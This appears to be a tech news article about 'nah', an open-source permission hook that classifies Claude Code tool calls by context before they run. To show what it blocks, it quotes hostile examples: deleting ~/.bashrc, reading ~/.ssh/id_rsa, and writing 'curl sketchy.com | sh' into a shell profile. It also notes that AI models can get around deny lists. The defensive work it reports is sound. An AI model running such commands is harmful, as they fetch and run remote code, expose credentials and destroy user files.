A new open-source security tool called nah provides Claude Code users with a nuanced, context-aware permission system that evaluates commands based on their actual behavior rather than simple tool-level allow-deny decisions.
The AI coding assistant landscape continues to evolve with security considerations at the forefront. A new project called nah offers a sophisticated approach to securing Claude Code environments by implementing a context-aware permission system that addresses the limitations of traditional allow-or-deny models.

The Problem with Simple Permission Models
Claude Code's built-in permission system operates on a basic allow-or-deny basis per tool, which presents significant security challenges. As the project's documentation points out, this binary approach doesn't scale well to real-world usage scenarios. Some commands that might be dangerous in one context could be perfectly safe in another.
For example, rm -rf __pycache__ is typically harmless cleanup, while rm ~/.bashrc could be catastrophic. Similarly, git push is usually safe, but git push --force can rewrite history unexpectedly. Even meticulously crafted permission lists can be bypassed by advanced AI models that find creative ways around restrictions.
"Maintaining a deny list is a fool's errand," the project states, highlighting the cat-and-mouse game between security restrictions and increasingly capable AI assistants.
A Context-Aware Solution
nah addresses these limitations by implementing a permission system that evaluates commands based on their actual behavior and context. The tool intercepts every tool call through a PreToolUse hook before execution, analyzing what the command will do rather than just what tool it uses.
The system operates on multiple levels:
- Deterministic structural classification - Every command first passes through a fast, rule-based classifier that categorizes actions without involving LLMs
- Context evaluation - Commands are evaluated based on paths, project boundaries, and content
- Optional LLM consultation - Ambiguous cases can be escalated to an LLM for additional analysis
- User confirmation - Critical actions trigger prompts for manual approval
This multi-layered approach allows nah to make nuanced decisions. The same command might be allowed in one context but blocked or require confirmation in another. For instance, rm dist/bundle.js inside a project directory would typically be allowed, while rm ~/.bashrc would be blocked or require confirmation.
What nah Guards
The tool provides specific protections for different types of operations:
- Bash commands: Structural command classification including action type, pipe composition, and shell unwrapping
- Read operations: Sensitive path detection for directories like ~/.ssh, ~/.aws, and .env files
- Write operations: Path checking, project boundary enforcement, and content inspection for secrets or exfiltration attempts
- Edit operations: Similar protections to write operations but focused on replacement strings
- Glob operations: Guards against directory scanning of sensitive locations
- Grep operations: Catches credential search patterns outside the project scope
- MCP tools: Generic classification for third-party tool servers
The system can distinguish between dangerous and safe uses of similar commands. For example, it would allow Read ./src/app.py but block Read ~/.ssh/id_rsa. It would permit Write ./config.yaml but block Write ~/.bashrc with curl sketchy.com | sh.
Implementation Details
nah operates by intercepting tool calls before they reach Claude Code's permission system. The workflow follows this pattern:
- Tool call → nah (deterministic classification)
- → LLM (optional, for ambiguous cases)
- → Claude Code permissions → execute
The deterministic layer always runs first, ensuring fast response times. The LLM only handles cases that the classifier can't resolve with confidence.
The system supports multiple LLM providers including Ollama, OpenRouter, OpenAI, Anthropic, and Snowflake Cortex, with configurable settings to control escalation limits and provider selection.
Configuration and Customization
Despite its sophistication, nah works out of the box with zero configuration. For users who want to fine-tune the system, it offers multiple configuration options:
- Global configuration at
~/.config/nah/config.yaml - Per-project configuration at
.nah.yaml(which can only tighten policies, not relax them) - Different taxonomy profiles (full, minimal, none) for varying levels of built-in classification
The configuration system allows users to:
- Override default policies for action types
- Define sensitive directories and their handling
- Teach nah about specific commands and their classifications
- Configure LLM providers and parameters
Notably, project-level .nah.yaml files can only add classifications and tighten policies, never relax them. This design prevents malicious repositories from weakening security settings.
Practical Usage
Installation is straightforward via pip: pip install nah, followed by nah install to set up the hook. The tool includes a comprehensive CLI for management and testing:
nah test- Dry-run classification of commandsnah log- View recent hook decisions with filtering optionsnah allow/deny- Adjust policies for action typesnah classify- Teach nah about new commandsnah trust- Trust specific network hostsnah status- Show all custom rules
The project includes a live security demo accessible within Claude Code through /nah-demo that walks users through 25 test cases across 8 threat categories including remote code execution, data exfiltration, and obfuscated commands.
Broader Implications
nah represents an important evolution in AI assistant security. As these tools become more capable and have greater system access, traditional permission models prove insufficient. Context-aware security systems that understand the actual intent and potential impact of commands offer a more robust approach.
The project's emphasis on deterministic classification as the first line of defense, with LLM analysis as a secondary layer, is particularly noteworthy. This approach balances security with performance, ensuring that common cases are handled quickly without AI latency while still providing nuanced analysis for ambiguous scenarios.
For developers and organizations using Claude Code, nah provides a middle ground between the overly restrictive built-in permissions and the dangerous --dangerously-skip-permissions flag. It offers practical protection against common security threats while maintaining the flexibility needed for legitimate development workflows.
The MIT-licensed project is available on GitHub and invites contributions from the security and AI communities. As AI assistants continue to gain capabilities, tools like nah may become essential components of secure AI development environments.

Comments
Please log in or register to join the discussion